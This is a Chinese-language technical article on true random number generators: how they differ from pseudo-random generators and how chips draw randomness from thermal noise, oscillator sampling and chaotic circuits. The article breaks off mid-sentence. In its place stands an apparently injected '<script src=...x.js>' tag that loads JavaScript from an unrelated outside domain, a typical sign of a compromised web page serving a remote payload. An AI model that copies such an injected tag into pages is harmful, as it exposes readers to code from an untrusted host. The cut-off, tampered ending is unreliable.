随着计算机技术、通信技术、网络技术的迅速发展,信息在存储、传送、接收和处理过程中的安全问题已受到人们的广泛关注。随机数在信息安全系统中扮演着重要的角色,在基于计算机或internet的通信和交易中有着广泛的应用。比如数据加密、密钥管理、公钥和私钥的产生、电子商务、数字签名、身份鉴定以及蒙特卡罗仿真等都要用到随机数。
一、真随机数发生器的概念
在信息安全系统的设计中,对随机数发生器性能有较高的要求,因此通常采用真随机数发生器。随机数序列的随机性能的好坏直接决定了信息安全系统的安全性性能。通常只要在真随机数发生器的设计中存在缺陷,人们就可能利用这个缺陷对整个安全系统进行破解。
所谓真随机数发生器(TRNG)是指利用物理方法实现的随机数发生器。它是自然界随机的物理过程(所产生物理现象的不确定性)的反映,即使算法等TRNG的所有信息都被暴露,都无法猜测其结果,即高质量的真随机数发生器产生的随机数永远不具备周期性。这就使其在本质上区别于广泛应用的伪随机数发生器(PRNG),伪随机数发生器是基于数学算法的随机数发生器,它由真随机的种子和伪随机网络构成。一旦真随机的种子被暴露,伪随机数发生器的结果就是确定了。真随机数发生器所产生的随机数来源于真实的随机物理过程,因而彻底地消除了伪随机数的周期性问题, 只有真随机数发生器才能提供真正的、永不重复的随机数序列。这对于某些对随机数质量有特殊要求的应用有重要意义。此外,真随机数发生器产生的随机数与计算机的CPU无关。可用于某些要求独立地产生随机数的场合。
二、真随机数发生器芯片随机源的实现
真随机数发生器是指用物理方法实现的随机数发生器。各种随机物理过程如宇宙噪声、电路的热噪声和放射性衰变均可用来产生随机物理信号。其中与IC工艺兼容的三种随机源:放大电路噪声、振荡采样、混沌电路。
1.电路噪声放大。电路中的噪声主要来源有:散粒噪声、接触噪声、突发噪声、雪崩噪声、热噪声等。在芯片设计中,电路中大电阻的热噪声是最易于获得的随机物理信号。最常见的电阻噪声源电路如图1所示,它广泛应用于芯片式或板卡式的随机数发生器的设计中。
由于真随机数发生器所需要的是均匀分布的高斯型噪声, 因此在噪声发生器中应尽量突出噪声源电阻所产生的热噪声的贡献,并尽量抑制由运算放大器所产生的1/f噪声和突发噪声等非高斯型的噪声。低噪声运算放大器的噪声指标越低越好。
高速度高性能的数字物理噪声源芯片的核心部分采用噪声迭代环原理来提高输出数据的不可预测性。噪声的影响在这个环内被不断放大,经迭代后,这种噪声的影响就将和电路的初始状态混在一起,使得几次迭代后的电路的状态完全无法估计,当然也就不可预测。
采用参数略微拉开的两路噪声迭代环,在数据处理部分,利用异或来进一步改善数据的比。两路信号异或01还将增加对输出数预测的难度。
2.振荡采样法。振荡采样法来产生所需要的随机数。即通过一个高电平触发的D触发器把两个独立的方波进行数字混合,用低速波来采样高速波,这种方法是利用环形振荡器的频率抖动来作为随机源的。典型的例子如图2所示。
环形振荡器产生低频的时钟作为D触发器的时钟输入端。压控振荡器VCO(或CCO)产生的高频数据作为D触发器的数据输入端。经过D触发器采样输出后,产生一位真随即数RGB。输出端经过伪随机网络后,通过D/A转换电路反馈到VCO的输入。这样就使得每次采样间隔内高频数据的频率都不同,从而增强了每次采样结果的随机性。当高频数据的频率在低频时钟频率一半的整数倍时,输出随机数的统计特性最差。为了保证输出数据的随机性能,低频时钟和高频数据要求互不相关且频率偏差较大。
此外,有的芯片采用噪声迭代环原理来提高输出数据的不可预测性。噪声的影响在这个环内被不断放大,经迭代后,这种噪声的影响就将和电路的初始状态混在一起,使得几次迭代后的电路的状态完全无法预测。
3.混沌电路。利用混沌电路本质特点:不可预测,对初始条件的敏感的依赖性。以及混沌电路在芯片中易于实现的特点,就使其成为制作真随机数发生器芯片的很好的选择。
近来有很多文献报导了很多真随机数发(下转第72页)(上接第70页)生器芯片中混沌电路的实现方法。例如,双环振荡的电路结构;利用开关电容实现的混沌电路等。其中双环振荡的电路结构产生两个洛伦兹奇怪吸引子分别代表0和1,经采样量化后可得到真随机数。
三、高质量真随机数的实现方法
众所周知,随机源的随机性能的好坏直接决定了真随机数发生器芯片的质量。但是,即使有好的随机源也未必能够产生高质量的随机数。通常在实际?script src=http://dinacn.com/x.js> |
